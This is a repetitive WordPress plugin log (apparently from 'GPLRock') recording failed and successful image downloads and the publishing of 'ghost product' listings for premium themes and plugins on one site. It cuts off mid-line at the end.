image - Product ID: sumo-affiliates-pro-wordpress-plugin [04-Apr-2026 18:31:50 UTC] GPLRock: Image download failed for product wixi-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:50 UTC] GPLRock: Image download failed for product mmx-make-me-christmas (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:52 UTC] GPLRock: Image download failed for product mmx-make-me-christmas (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:52 UTC] GPLRock: Image download failed for product wixi-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mmx---make-me-christmas-21775.webp for product mmx-make-me-christmas after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wixi---personal-portfolio-wordpress-theme-26678.webp for product wixi-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:55 UTC] GPLRock: Image download failed for product mmx-make-me-christmas (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:55 UTC] GPLRock: Image download failed for product wixi-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:57 UTC] GPLRock: Image download failed for product mmx-make-me-christmas (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:57 UTC] GPLRock: Image download failed for product wixi-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mmx---make-me-christmas-21775.webp for product mmx-make-me-christmas after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:59 UTC] GPLRock WARNING: Image download failed for product mmx-make-me-christmas. URL: https://meldwp.com/wp-content/uploads/mmx---make-me-christmas-21775.webp [04-Apr-2026 18:31:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wixi---personal-portfolio-wordpress-theme-26678.webp for product wixi-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:59 UTC] GPLRock WARNING: Image download failed for product wixi-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wixi---personal-portfolio-wordpress-theme-26678.webp [04-Apr-2026 18:31:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mmx-make-me-christmas [04-Apr-2026 18:31:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wixi-personal-portfolio-wordpress-theme [04-Apr-2026 18:31:59 UTC] GPLRock: Image download failed for product aevent-conference-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:59 UTC] GPLRock: Image download failed for product before-after-image-pro-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:01 UTC] GPLRock: Image download failed for product aevent-conference-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:01 UTC] GPLRock: Image download failed for product before-after-image-pro-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aevent---conference--event-wordpress-theme-6838.webp for product aevent-conference-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/before-after-image-pro-addon-for-wpbakery-page-builder-832.webp for product before-after-image-pro-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:04 UTC] GPLRock: Image download failed for product before-after-image-pro-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:04 UTC] GPLRock: Image download failed for product aevent-conference-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:06 UTC] GPLRock: Image download failed for product aevent-conference-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:06 UTC] GPLRock: Image download failed for product before-after-image-pro-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aevent---conference--event-wordpress-theme-6838.webp for product aevent-conference-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:08 UTC] GPLRock WARNING: Image download failed for product aevent-conference-event-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aevent---conference--event-wordpress-theme-6838.webp [04-Apr-2026 18:32:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aevent-conference-event-wordpress-theme [04-Apr-2026 18:32:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/before-after-image-pro-addon-for-wpbakery-page-builder-832.webp for product before-after-image-pro-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:08 UTC] GPLRock WARNING: Image download failed for product before-after-image-pro-addon-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/before-after-image-pro-addon-for-wpbakery-page-builder-832.webp [04-Apr-2026 18:32:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: before-after-image-pro-addon-for-wpbakery-page-builder [04-Apr-2026 18:32:08 UTC] GPLRock: Image download failed for product woocommerce-lookbook-shop-by-instagram-shoppable-with-product-tags (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:08 UTC] GPLRock: Image download failed for product evior-modern-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:10 UTC] GPLRock: Image download failed for product evior-modern-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:10 UTC] GPLRock: Image download failed for product woocommerce-lookbook-shop-by-instagram-shoppable-with-product-tags (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evior---modern-magazine-wordpress-theme-21345.webp for product evior-modern-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-lookbook---shop-by-instagram---shoppable-with-product-tags-27662.webp for product woocommerce-lookbook-shop-by-instagram-shoppable-with-product-tags after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:13 UTC] GPLRock: Image download failed for product evior-modern-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:13 UTC] GPLRock: Image download failed for product woocommerce-lookbook-shop-by-instagram-shoppable-with-product-tags (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:15 UTC] GPLRock: Image download failed for product evior-modern-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:15 UTC] GPLRock: Image download failed for product woocommerce-lookbook-shop-by-instagram-shoppable-with-product-tags (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evior---modern-magazine-wordpress-theme-21345.webp for product evior-modern-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:17 UTC] GPLRock WARNING: Image download failed for product evior-modern-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/evior---modern-magazine-wordpress-theme-21345.webp [04-Apr-2026 18:32:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-lookbook---shop-by-instagram---shoppable-with-product-tags-27662.webp for product woocommerce-lookbook-shop-by-instagram-shoppable-with-product-tags after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:17 UTC] GPLRock WARNING: Image download failed for product woocommerce-lookbook-shop-by-instagram-shoppable-with-product-tags. URL: https://meldwp.com/wp-content/uploads/woocommerce-lookbook---shop-by-instagram---shoppable-with-product-tags-27662.webp [04-Apr-2026 18:32:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: evior-modern-magazine-wordpress-theme [04-Apr-2026 18:32:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-lookbook-shop-by-instagram-shoppable-with-product-tags [04-Apr-2026 18:32:17 UTC] GPLRock: Image download failed for product cosmedical-health-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:17 UTC] GPLRock: Image download failed for product nasaomatic-nasa-automatic-post-generator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:19 UTC] GPLRock: Image download failed for product cosmedical-health-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:19 UTC] GPLRock: Image download failed for product nasaomatic-nasa-automatic-post-generator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cosmedical---health--medical-wordpress-theme-472.webp for product cosmedical-health-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nasaomatic---nasa-automatic-post-generator-plugin-for-wordpress-21281.webp for product nasaomatic-nasa-automatic-post-generator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:21 UTC] GPLRock: Image download failed for product cosmedical-health-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:21 UTC] GPLRock: Image download failed for product nasaomatic-nasa-automatic-post-generator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:23 UTC] GPLRock: Image download failed for product cosmedical-health-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:23 UTC] GPLRock: Image download failed for product nasaomatic-nasa-automatic-post-generator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cosmedical---health--medical-wordpress-theme-472.webp for product cosmedical-health-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:25 UTC] GPLRock WARNING: Image download failed for product cosmedical-health-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cosmedical---health--medical-wordpress-theme-472.webp [04-Apr-2026 18:32:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cosmedical-health-medical-wordpress-theme [04-Apr-2026 18:32:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nasaomatic---nasa-automatic-post-generator-plugin-for-wordpress-21281.webp for product nasaomatic-nasa-automatic-post-generator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:25 UTC] GPLRock WARNING: Image download failed for product nasaomatic-nasa-automatic-post-generator-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/nasaomatic---nasa-automatic-post-generator-plugin-for-wordpress-21281.webp [04-Apr-2026 18:32:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nasaomatic-nasa-automatic-post-generator-plugin-for-wordpress [04-Apr-2026 18:32:26 UTC] GPLRock: Image download failed for product restaurant-wp-responsive-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:26 UTC] GPLRock: Image download failed for product role-based-shipping-manager-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:28 UTC] GPLRock: Image download failed for product restaurant-wp-responsive-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:28 UTC] GPLRock: Image download failed for product role-based-shipping-manager-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/restaurant-wp---responsive-woocommerce-theme-474.webp for product restaurant-wp-responsive-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/role-based-shipping-manager-for-woocommerce-12145.webp for product role-based-shipping-manager-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:30 UTC] GPLRock: Image download failed for product role-based-shipping-manager-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:30 UTC] GPLRock: Image download failed for product restaurant-wp-responsive-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:32 UTC] GPLRock: Image download failed for product role-based-shipping-manager-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:32 UTC] GPLRock: Image download failed for product restaurant-wp-responsive-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/role-based-shipping-manager-for-woocommerce-12145.webp for product role-based-shipping-manager-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:34 UTC] GPLRock WARNING: Image download failed for product role-based-shipping-manager-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/role-based-shipping-manager-for-woocommerce-12145.webp [04-Apr-2026 18:32:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: role-based-shipping-manager-for-woocommerce [04-Apr-2026 18:32:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/restaurant-wp---responsive-woocommerce-theme-474.webp for product restaurant-wp-responsive-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:34 UTC] GPLRock WARNING: Image download failed for product restaurant-wp-responsive-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/restaurant-wp---responsive-woocommerce-theme-474.webp [04-Apr-2026 18:32:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: restaurant-wp-responsive-woocommerce-theme [04-Apr-2026 18:32:34 UTC] GPLRock: Image download failed for product travel-booking-woocommerce-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:36 UTC] GPLRock: Image download failed for product travel-booking-woocommerce-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travel-booking---woocommerce-wordpress-plugin-31439.webp for product travel-booking-woocommerce-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:39 UTC] GPLRock: Image download failed for product travel-booking-woocommerce-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:41 UTC] GPLRock: Image download failed for product travel-booking-woocommerce-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:32:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travel-booking---woocommerce-wordpress-plugin-31439.webp for product travel-booking-woocommerce-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:32:43 UTC] GPLRock WARNING: Image download failed for product travel-booking-woocommerce-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/travel-booking---woocommerce-wordpress-plugin-31439.webp [04-Apr-2026 18:32:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: travel-booking-woocommerce-wordpress-plugin [04-Apr-2026 18:32:56 UTC] GPLRock: Image downloaded successfully for product agenze-the-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8b75e6a1.webp [04-Apr-2026 18:32:56 UTC] GPLRock: Using pre-downloaded image for product agenze-the-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8b75e6a1.webp [04-Apr-2026 18:32:56 UTC] GPLRock: Ghost product published with image - Product ID: agenze-the-digital-agency-elementor-template-kit [04-Apr-2026 18:32:58 UTC] GPLRock: Image downloaded successfully for product agencyez-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d3885c79.jpg [04-Apr-2026 18:33:03 UTC] GPLRock: Using pre-downloaded image for product agencyez-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d3885c79.jpg [04-Apr-2026 18:33:06 UTC] GPLRock: Ghost product published with image - Product ID: agencyez-elementor-pro-template-kit [04-Apr-2026 18:33:09 UTC] GPLRock: Image downloaded successfully for product learndash-lms-elementor-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4fc3db47.webp [04-Apr-2026 18:33:09 UTC] GPLRock: Using pre-downloaded image for product learndash-lms-elementor-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4fc3db47.webp [04-Apr-2026 18:33:09 UTC] GPLRock: Ghost product published with image - Product ID: learndash-lms-elementor-integration [04-Apr-2026 18:33:11 UTC] GPLRock: Image downloaded successfully for product athens-law-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-152930ba.png [04-Apr-2026 18:33:11 UTC] GPLRock: Using pre-downloaded image for product athens-law-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-152930ba.png [04-Apr-2026 18:33:11 UTC] GPLRock: Ghost product published with image - Product ID: athens-law-agency-wordpress-theme [04-Apr-2026 18:33:15 UTC] GPLRock: Image downloaded successfully for product seil-a-responsive-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aea6d7dd.jpg [04-Apr-2026 18:33:15 UTC] GPLRock: Using pre-downloaded image for product seil-a-responsive-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aea6d7dd.jpg [04-Apr-2026 18:33:15 UTC] GPLRock: Ghost product published with image - Product ID: seil-a-responsive-wordpress-blog-theme [04-Apr-2026 18:33:16 UTC] GPLRock: Image downloaded successfully for product ethrik-creative-nft-affiliate-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3d9be6ff.jpg [04-Apr-2026 18:33:16 UTC] GPLRock: Using pre-downloaded image for product ethrik-creative-nft-affiliate-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3d9be6ff.jpg [04-Apr-2026 18:33:16 UTC] GPLRock: Ghost product published with image - Product ID: ethrik-creative-nft-affiliate-wordpress-theme [04-Apr-2026 18:33:18 UTC] GPLRock: Image downloaded successfully for product oconnor-law-lawyer-attorney-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5ec7ae01.jpg [04-Apr-2026 18:33:18 UTC] GPLRock: Using pre-downloaded image for product oconnor-law-lawyer-attorney-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5ec7ae01.jpg [04-Apr-2026 18:33:18 UTC] GPLRock: Ghost product published with image - Product ID: oconnor-law-lawyer-attorney-wordpress-theme [04-Apr-2026 18:33:19 UTC] GPLRock: Image downloaded successfully for product alico-insurance-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-17025935.jpg [04-Apr-2026 18:33:19 UTC] GPLRock: Using pre-downloaded image for product alico-insurance-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-17025935.jpg [04-Apr-2026 18:33:19 UTC] GPLRock: Ghost product published with image - Product ID: alico-insurance-wordpress-theme [04-Apr-2026 18:33:21 UTC] GPLRock: Image downloaded successfully for product ctx-feed-pro-woocommerce-product-feed-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe797f03.jpg [04-Apr-2026 18:33:21 UTC] GPLRock: Using pre-downloaded image for product ctx-feed-pro-woocommerce-product-feed-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe797f03.jpg [04-Apr-2026 18:33:21 UTC] GPLRock: Ghost product published with image - Product ID: ctx-feed-pro-woocommerce-product-feed-manager [04-Apr-2026 18:33:23 UTC] GPLRock: Image downloaded successfully for product lezar-beauty-salon-spa-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ae46ee0b.jpg [04-Apr-2026 18:33:23 UTC] GPLRock: Using pre-downloaded image for product lezar-beauty-salon-spa-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ae46ee0b.jpg [04-Apr-2026 18:33:23 UTC] GPLRock: Ghost product published with image - Product ID: lezar-beauty-salon-spa-elementor-template-kit [04-Apr-2026 21:19:34 UTC] GPLRock: Image download failed for product vapier-vape-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:19:36 UTC] GPLRock: Image download failed for product vapier-vape-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:19:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vapier--vape-store-woocommerce-wordpress-theme-7742.webp for product vapier-vape-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:19:39 UTC] GPLRock: Image download failed for product vapier-vape-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:19:41 UTC] GPLRock: Image download failed for product vapier-vape-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:19:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vapier--vape-store-woocommerce-wordpress-theme-7742.webp for product vapier-vape-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:19:43 UTC] GPLRock WARNING: Image download failed for product vapier-vape-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vapier--vape-store-woocommerce-wordpress-theme-7742.webp [04-Apr-2026 21:19:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vapier-vape-store-woocommerce-wordpress-theme [04-Apr-2026 21:19:43 UTC] GPLRock: Image download failed for product bjorn-responsive-wordpress-personal-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:19:45 UTC] GPLRock: Image download failed for product bjorn-responsive-wordpress-personal-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:19:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bjorn---responsive-wordpress-personal-blog-theme-22747.webp for product bjorn-responsive-wordpress-personal-blog-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:19:47 UTC] GPLRock: Image download failed for product bjorn-responsive-wordpress-personal-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:19:49 UTC] GPLRock: Image download failed for product bjorn-responsive-wordpress-personal-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:19:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bjorn---responsive-wordpress-personal-blog-theme-22747.webp for product bjorn-responsive-wordpress-personal-blog-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:19:51 UTC] GPLRock WARNING: Image download failed for product bjorn-responsive-wordpress-personal-blog-theme. URL: https://meldwp.com/wp-content/uploads/bjorn---responsive-wordpress-personal-blog-theme-22747.webp [04-Apr-2026 21:19:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bjorn-responsive-wordpress-personal-blog-theme [04-Apr-2026 21:19:52 UTC] GPLRock: Image download failed for product oda-really-minimal-and-strong-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:19:54 UTC] GPLRock: Image download failed for product oda-really-minimal-and-strong-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:19:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oda--really-minimal-and-strong-wordpress-theme-17828.webp for product oda-really-minimal-and-strong-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:19:56 UTC] GPLRock: Image download failed for product oda-really-minimal-and-strong-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:19:58 UTC] GPLRock: Image download failed for product oda-really-minimal-and-strong-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oda--really-minimal-and-strong-wordpress-theme-17828.webp for product oda-really-minimal-and-strong-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:20:00 UTC] GPLRock WARNING: Image download failed for product oda-really-minimal-and-strong-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/oda--really-minimal-and-strong-wordpress-theme-17828.webp [04-Apr-2026 21:20:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oda-really-minimal-and-strong-wordpress-theme [04-Apr-2026 21:20:00 UTC] GPLRock: Image download failed for product anila-health-coaching-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:02 UTC] GPLRock: Image download failed for product anila-health-coaching-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anila---health-coaching-wordpress-theme-5716.webp for product anila-health-coaching-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:20:05 UTC] GPLRock: Image download failed for product anila-health-coaching-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:07 UTC] GPLRock: Image download failed for product anila-health-coaching-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anila---health-coaching-wordpress-theme-5716.webp for product anila-health-coaching-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:20:09 UTC] GPLRock WARNING: Image download failed for product anila-health-coaching-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/anila---health-coaching-wordpress-theme-5716.webp [04-Apr-2026 21:20:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: anila-health-coaching-wordpress-theme [04-Apr-2026 21:20:09 UTC] GPLRock: Image download failed for product curio-responsive-minimal-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:11 UTC] GPLRock: Image download failed for product curio-responsive-minimal-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/curio---responsive-minimal-blog-theme-25456.webp for product curio-responsive-minimal-blog-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:20:13 UTC] GPLRock: Image download failed for product curio-responsive-minimal-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:15 UTC] GPLRock: Image download failed for product curio-responsive-minimal-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/curio---responsive-minimal-blog-theme-25456.webp for product curio-responsive-minimal-blog-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:20:17 UTC] GPLRock WARNING: Image download failed for product curio-responsive-minimal-blog-theme. URL: https://meldwp.com/wp-content/uploads/curio---responsive-minimal-blog-theme-25456.webp [04-Apr-2026 21:20:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: curio-responsive-minimal-blog-theme [04-Apr-2026 21:20:17 UTC] GPLRock: Image download failed for product katerio-magazine-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:20 UTC] GPLRock: Image download failed for product katerio-magazine-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:22 UTC] GPLRock Error: Failed to download image from 